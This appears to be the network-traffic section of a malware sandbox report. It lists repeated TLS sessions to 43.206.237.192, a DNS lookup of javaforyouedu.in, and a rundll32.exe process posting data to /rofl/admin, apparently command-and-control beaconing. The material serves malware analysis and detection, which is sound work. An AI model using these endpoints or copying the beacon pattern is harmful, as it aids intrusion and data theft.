      Aug 28, 2024 13:39:16.637512922 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:16.638005972 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:16.638012886 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:16.639280081 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:16.639285088 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:17.135099888 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:17.135159016 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:17.135215044 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:17.135263920 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:17.135575056 CEST49750443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:17.135581970 CEST4434975043.206.237.192192.168.2.4
      Aug 28, 2024 13:39:31.434950113 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.434978008 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:31.435055017 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.435246944 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.435260057 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:31.572761059 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.572772980 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:31.572840929 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.573088884 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:31.573101044 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.388886929 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.388909101 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.388976097 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.389018059 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.389472961 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.389477015 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.389993906 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.389997959 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.390799999 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.390804052 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.393618107 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.393624067 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.821850061 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.821933985 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.821940899 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.821984053 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.822432995 CEST49751443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.822437048 CEST4434975143.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.823255062 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.823318005 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.823326111 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.823338985 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:32.823367119 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.823388100 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.823715925 CEST49752443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:32.823723078 CEST4434975243.206.237.192192.168.2.4
      Aug 28, 2024 13:39:46.221594095 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:46.221632004 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:46.221719027 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:46.222353935 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:46.222368956 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.045598030 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.045692921 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.046298027 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.046304941 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.047836065 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.047842026 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.497339010 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.497406006 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:47.497514963 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.497514963 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.497749090 CEST49753443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:47.497762918 CEST4434975343.206.237.192192.168.2.4
      Aug 28, 2024 13:39:52.857203007 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857237101 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:52.857310057 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857309103 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857342005 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:52.857395887 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857562065 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857577085 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:52.857692957 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:52.857707024 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.664959908 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.665030956 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.665491104 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.665499926 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.666925907 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.666932106 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.686532021 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.686608076 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.687043905 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.687052011 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:53.688530922 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:53.688536882 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.110078096 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.110141039 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.110152960 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.110165119 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.110210896 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.110235929 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.110379934 CEST49754443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.110388994 CEST4434975443.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.142112970 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.142195940 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:39:54.142203093 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.142260075 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.142461061 CEST49755443192.168.2.443.206.237.192
      Aug 28, 2024 13:39:54.142472029 CEST4434975543.206.237.192192.168.2.4
      Aug 28, 2024 13:40:00.497952938 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:00.497967958 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:00.498095036 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:00.498395920 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:00.498405933 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.280878067 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.280941010 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.281424999 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.281430960 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.282605886 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.282610893 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.711249113 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.711313009 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:01.711342096 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.711379051 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.711613894 CEST49756443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:01.711622000 CEST4434975643.206.237.192192.168.2.4
      Aug 28, 2024 13:40:19.735697031 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:19.735750914 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:19.735827923 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:19.736064911 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:19.736082077 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.556066036 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.556243896 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.556936979 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.556947947 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.558135986 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.558141947 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.992276907 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.992352962 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:20.992357969 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.992398024 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.992600918 CEST49757443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:20.992618084 CEST4434975743.206.237.192192.168.2.4
      Aug 28, 2024 13:40:21.122360945 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.122414112 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:21.122483969 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.122760057 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.122778893 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:21.169378042 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.169423103 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:21.169503927 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.169765949 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:21.169780016 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.891752958 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.891819954 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.892534018 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.892544985 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.894311905 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.894318104 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.897874117 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.897926092 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.898554087 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.898570061 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:22.900320053 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:22.900336981 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.334438086 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.334510088 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.334603071 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.334755898 CEST49758443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.334779024 CEST4434975843.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.340621948 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.340681076 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.340703964 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.341038942 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.341084003 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.341149092 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.341159105 CEST4434975943.206.237.192192.168.2.4
      Aug 28, 2024 13:40:23.341166019 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:23.341711044 CEST49759443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.028804064 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.028856039 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:46.028942108 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.029252052 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.029264927 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:46.824866056 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:46.824937105 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.825333118 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.825345993 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:46.826581955 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:46.826586962 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:47.270417929 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:47.270481110 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:47.270484924 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:47.270529032 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:47.270709991 CEST49760443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:47.270730019 CEST4434976043.206.237.192192.168.2.4
      Aug 28, 2024 13:40:52.341614962 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.341711998 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:52.341806889 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.342034101 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.342080116 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:52.356941938 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.356966972 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:52.357043982 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.357224941 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:52.357239008 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.150129080 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.150260925 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.150907993 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.150917053 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.154577017 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.154582977 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.163218975 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.163297892 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.163666964 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.163670063 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.164743900 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.164755106 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.600370884 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.600444078 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.600451946 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.600513935 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.600739002 CEST49761443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.600786924 CEST4434976143.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.610692978 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.610749006 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:40:53.610754013 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.610790014 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.610939026 CEST49762443192.168.2.443.206.237.192
      Aug 28, 2024 13:40:53.610958099 CEST4434976243.206.237.192192.168.2.4
      Aug 28, 2024 13:41:07.294702053 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:07.294764996 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:07.294836998 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:07.295113087 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:07.295128107 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.091916084 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.092010021 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.136085987 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.136101007 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.137770891 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.137779951 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.536794901 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.536848068 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:08.536967039 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.537048101 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.537689924 CEST49763443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:08.537703037 CEST4434976343.206.237.192192.168.2.4
      Aug 28, 2024 13:41:18.607125998 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.607258081 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:18.607364893 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.607887983 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.607925892 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:18.622384071 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.622446060 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:18.622529984 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.622920036 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:18.622932911 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.442564964 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.442744017 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.444420099 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.444428921 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.445741892 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.445748091 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.446244955 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.446338892 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.446603060 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.446634054 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.447731972 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.447745085 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.880333900 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.880386114 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.880390882 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.880425930 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.880681038 CEST49765443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.880698919 CEST4434976543.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.899460077 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.899518967 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:19.899524927 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.899559975 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.899755955 CEST49764443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:19.899772882 CEST4434976443.206.237.192192.168.2.4
      Aug 28, 2024 13:41:32.576462984 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:32.576500893 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:32.576576948 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:32.577121973 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:32.577132940 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.388235092 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.388312101 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:33.389719009 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:33.389725924 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.390986919 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:33.390991926 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.852284908 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.852344036 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:33.852520943 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:33.852847099 CEST49766443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:33.852860928 CEST4434976643.206.237.192192.168.2.4
      Aug 28, 2024 13:41:48.914560080 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.914664984 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:48.914894104 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.915496111 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.915529966 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:48.935494900 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.935522079 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:48.935597897 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.935898066 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:48.935920954 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.737180948 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.737329006 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.738965988 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.738987923 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.742856979 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.742872000 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.763701916 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.763921022 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.764777899 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.764792919 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:49.768146992 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:49.768157005 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.192914009 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.192969084 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.193182945 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.193218946 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.193265915 CEST49767443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.193295002 CEST4434976743.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.215239048 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.215305090 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.215348959 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.215400934 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.215497017 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.215500116 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.215543985 CEST4434976843.206.237.192192.168.2.4
      Aug 28, 2024 13:41:50.215553999 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:50.215595961 CEST49768443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:59.873104095 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:59.873138905 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:41:59.873219013 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:59.873476028 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:41:59.873486996 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:00.679550886 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:00.682044029 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:42:00.682941914 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:42:00.682954073 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:00.684415102 CEST49769443192.168.2.443.206.237.192
      Aug 28, 2024 13:42:00.684420109 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:01.121143103 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:01.121200085 CEST4434976943.206.237.192192.168.2.4
      Aug 28, 2024 13:42:01.121272087 CEST49769443192.168.2.443.206.237.192
      TimestampSource PortDest PortSource IPDest IP
      Aug 28, 2024 13:37:57.760030985 CEST5336653192.168.2.41.1.1.1
      Aug 28, 2024 13:37:57.771446943 CEST53533661.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Aug 28, 2024 13:37:57.760030985 CEST192.168.2.41.1.1.10x5aa8Standard query (0)javaforyouedu.inA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Aug 28, 2024 13:37:57.771446943 CEST1.1.1.1192.168.2.40x5aa8No error (0)javaforyouedu.in43.206.237.192A (IP address)IN (0x0001)false
      • javaforyouedu.in
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.44973043.206.237.1924437372C:\Windows\System32\rundll32.exe
      TimestampBytes transferredDirectionData
      2024-08-28 11:37:58 UTC251OUTPOST /rofl/admin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
      Host: javaforyouedu.in
      Content-Length: 538
      Connection: Keep-Alive
      Cache-Control: no-cache
